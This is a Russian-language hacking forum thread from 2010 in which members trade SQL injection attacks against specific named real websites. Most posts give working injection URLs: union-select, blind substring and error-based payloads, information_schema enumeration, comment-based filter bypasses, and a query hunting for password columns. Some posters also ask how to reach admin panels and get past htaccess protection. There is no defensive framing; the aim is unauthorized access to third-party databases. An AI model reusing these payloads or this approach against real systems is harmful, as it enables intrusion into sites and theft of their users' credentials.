Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Почему не показывают версии?

    http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sElect%20version%28%29+--+ :mad:
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.catpaisatge.net/dossiers/jardins/eng/premsa2.php?idReg=-3307+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
     
    _________________________
    1 person likes this.
  3. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    URL уязвима

    http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086

    не может рассчитывать колонны
     
  4. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Лучше не вводи в заблуждение народ, если не знаешь. Есть там инъект.
    Code:
    http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=5#
    ошибка выводится
    Code:
    http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=777#
    Ошибки нет
     
  5. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Помогите раскрутить скулю.
    http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+
    а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.
    Буду рад любым примерам, т.к. опыта маловато...
    Вывод в ошибке.
     
    #14145 auth_root, 15 Jul 2010
    Last edited: 15 Jul 2010
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://banken.ruilen.nl/random.php?catid=473+and+substring(database(),1,1)=char(65)

    и так далее
     
    _________________________
  7. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Версия пятая
    http://banken.ruilen.nl/random.php?catid=473+and+ascii(lower(substring(version(),1,1)))=53--+

    зачем юзать подзапросы, есть же вывод... Я так месяц буду перебирать =(

    Мне бы получить таблицы и колонки с information_schema.tables/columns раз версия пятая. а я чет не могу =\
     
    #14147 auth_root, 15 Jul 2010
    Last edited: 15 Jul 2010
  8. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Есть вывод ошибки. Зачем посимвольно?
    Code:
    http://banken.ruilen.nl/random.php?catid=473+and+row(1,1)%3E(select%20count(*),concat(version(),0x3a,floor(rand()*2))+x+from+(select+1+union+select+2)a+group+by+x+limit+1)#
     
    #14148 The matrix, 15 Jul 2010
    Last edited by a moderator: 16 Jul 2010
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    это просто один из методов
     
    _________________________
    1 person likes this.
  10. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Разумеется один из методов.
    Ты предпочитаешь использовать не оптимальные и медленные способы? Чем оптимальные и быстрые, которые хотят видеть просящие помочь? 0_о
    Это все равно, что пить воду с помощью вилки(медленно, но все же один из способов).

    Пойду коньяка жахну с горя.
     
  11. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Полностью поддерживаю. Оптимально. Не мог бы ты ткнуть на статейку по приведенному тобой методу. Т.к. мне во многих местах непонятно что к чему, какие запросы что выполняют и для чего =) Я первый раз сталкиваюсь с подобным.
    И все равно как получить имена таблиц и колумнов не понял =) А это главный вопрос, и просьба...
     
  12. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    https://forum.antichat.ru/thread119047.html
    https://forum.antichat.ru/thread19844.html
     
    #14152 Дирижабль, 16 Jul 2010
    Last edited by a moderator: 16 Jul 2010
    2 people like this.
  13. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    :confused:
     
  14. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    добрый день!

    Почему второй запрос появляется ошибка?

    http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/*/+--+
    -->5.1.47


    http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/%20fRom/
    **/information_schema.tables/**/wheRe/**/tAble_schema=dataBase()*/+--+
    --> error 403
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    скорее всего просто доступа к informatio_schema нет
     
  16. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    haito

    Code:
    http://www.filarmonika.com/book-description.php?pid=3+and+1=2+/*!union*/+select+1,2,3,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),5,6,7,8,9+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
    таблица:abriledi_filarmonika:member_login

    PS:admin-panel там под hataccessom, просто под юзером логинеться смысла нет ( там даже uploada нет, так что скуль гиблая, люди кто знает способы обхода хтаццесса подскажите )

    Seravin
    Не стоит вводить людей в заблуждение )
     
    #14156 Dare, 16 Jul 2010
    Last edited: 16 Jul 2010
  17. boberko

    boberko New Member

    Joined:
    24 Jan 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    всем привет!
    вот скуля:
    Code:
    _http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,  3,concat_ws(char(58),version(),user(),database(),@  @version_compile_os),5,6,7+--+
    админка:
    Code:
    _http://www.fcdinamokirov.ru/admin.php
    как зайти в админку с помощью скуля?возможно ли?
     
    #14157 boberko, 16 Jul 2010
    Last edited: 16 Jul 2010
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    иди лучше и подумай что ты будешь писать в сочинение "Как я провел лето", вопрос тупее некуда... даже нубом обозвать тебя и то будет похвалой.. тебе бейсик авторизация говорит о чем нибудь?
     
    1 person likes this.
  19. Yetisports

    Yetisports Banned

    Joined:
    11 Jul 2010
    Messages:
    147
    Likes Received:
    12
    Reputations:
    17
    упой вопрос, раньше их пропускал, а ща задумался.
    Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    все зависит от скули...это как способ защиты..большинство помимо редиректа и другой арсенал используют для защиты...но попытка не пытка, бывало что канало лишь подзапросами...а бывало что и нормально работал запрос...
     
Thread Status:
Not open for further replies.